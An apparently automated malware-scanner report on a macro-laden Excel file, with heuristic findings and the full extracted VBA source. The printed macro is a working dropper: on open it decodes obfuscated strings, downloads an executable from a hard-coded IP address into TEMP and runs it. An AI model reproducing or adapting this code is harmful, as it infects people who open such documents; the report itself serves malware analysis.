Verdict: MALICIOUS
Risk Score: 338
Malware Insights
MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
This Excel document contains VBA macros that leverage the Auto_Open function and call ShellExecute, indicating an attempt to execute arbitrary code. The document body explicitly prompts the user to enable macros, a common social engineering tactic. The embedded URL http://Motobit.cz is likely associated with the malware's infrastructure.
Heuristics (11)
- ClamAV: Doc.Macro.GenericHeuristic-5931846-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5931846-4
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `'Shell thefile, vbMaximizedFocus`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set lloosoddw = CreateObject(xm1)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Private Sub Auto_open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `thefile = Environ(tempe) & filee`
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND): Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://Motobit.cz (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4641 bytes |

SHA-256: 90c237953807587047ae6d1233dc61c0175993a9416ffd4423b430d61b7b7df2
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As LongPtr)
Public Declare PtrSafe Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If

Function KKiwiwiiww(ByVal MXjjwjwjssdx)
    'rfc1521
    '1999 Antonin Foller, Motobit Software, http://Motobit.cz
    Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim dataLength, sOut, groupBegin
    'remove white spaces, If any
    MXjjwjwjssdx = Replace(MXjjwjwjssdx, vbCrLf, "")
    MXjjwjwjssdx = Replace(MXjjwjwjssdx, vbTab, "")
    MXjjwjwjssdx = Replace(MXjjwjwjssdx, " ", "")
    'The source must consists from groups with Len of 4 chars
    dataLength = Len(MXjjwjwjssdx)
    If dataLength Mod 4 <> 0 Then
        Err.Raise 1, "KKiwiwiiww", "Bad Base64 string."
        Exit Function
    End If
    ' Now decode each group:
    For groupBegin = 1 To dataLength Step 4
        Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
        ' Each data group encodes up To 3 actual bytes.
        numDataBytes = 3
        nGroup = 0
        For CharCounter = 0 To 3
            ' Convert each character into 6 bits of data, And add it To
            ' an integer For temporary storage. If a character is a '=', there
            ' is one fewer data byte. (There can only be a maximum of 2 '=' In
            ' the whole string.)
            thisChar = Mid(MXjjwjwjssdx, groupBegin + CharCounter, 1)
            If thisChar = "=" Then
                numDataBytes = numDataBytes - 1
                thisData = 0
            Else
                thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
            End If
            If thisData = -1 Then
                Err.Raise 2, "KKiwiwiiww", "Bad character In Base64 string."
                Exit Function
            End If
            nGroup = 64 * nGroup + thisData
        Next
        'Hex splits the long To 6 groups with 4 bits
        nGroup = Hex(nGroup)
        'Add leading zeros
        nGroup = String(6 - Len(nGroup), "0") & nGroup
        'Convert the 3 byte hex integer (6 chars) To 3 characters
        pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
            Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
            Chr(CByte("&H" & Mid(nGroup, 5, 2)))
        'add numDataBytes characters To out string
        sOut = sOut & Left(pOut, numDataBytes)
    Next
    KKiwiwiiww = sOut
End Function

Function Ododoode(ByVal Mncncne As String, ByVal mkooowe As String) As Boolean
    Dim lloosoddw As Object, i As Long, UIiiwweew As Long, dsdsdsdcfg() As Byte
    Dim xm1 As String
    Dim xm2 As String
    xm1 = KKiwiwiiww("TVNYTUwyLlhNTEhUVFA=")
    xm2 = KKiwiwiiww("R0VU")
    Set lloosoddw = CreateObject(xm1)
    lloosoddw.Open xm2, Mncncne, False
    lloosoddw.Send
    Do While lloosoddw.readyState <> 4
        DoEvents
    Loop
    dsdsdsdcfg = lloosoddw.responseBody
    UIiiwweew = FreeFile
    If Dir(mkooowe) <> "" Then Kill mkooowe
    Open mkooowe For Binary As #UIiiwweew
    Put #UIiiwweew, , dsdsdsdcfg
    Close #UIiiwweew
    Set lloosoddw = Nothing
End Function

Private Sub Auto_open()
    Dim thefile As String
    Dim tempe As String
    tempe = KKiwiwiiww("VEVNUA==")
    Dim filee As String
    filee = KKiwiwiiww("XGV4Y2VscGx1Z2luLmV4ZQ==")
    thefile = Environ(tempe) & filee
    Dim linke As String
    linke = KKiwiwiiww("aHR0cDovLzExMS45MC4xNTkuMTQvfm1pci9hYmMvdC5kYXQ=")
    'MsgBox linke
    Ododoode linke, thefile
    'MsgBox thefile
    'Shell thefile, vbMaximizedFocus
    Dim abc As Integer
    abc = 44 + 444 - 90
    X = ShellExecute(0, "Open", thefile, "", "", 1)
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```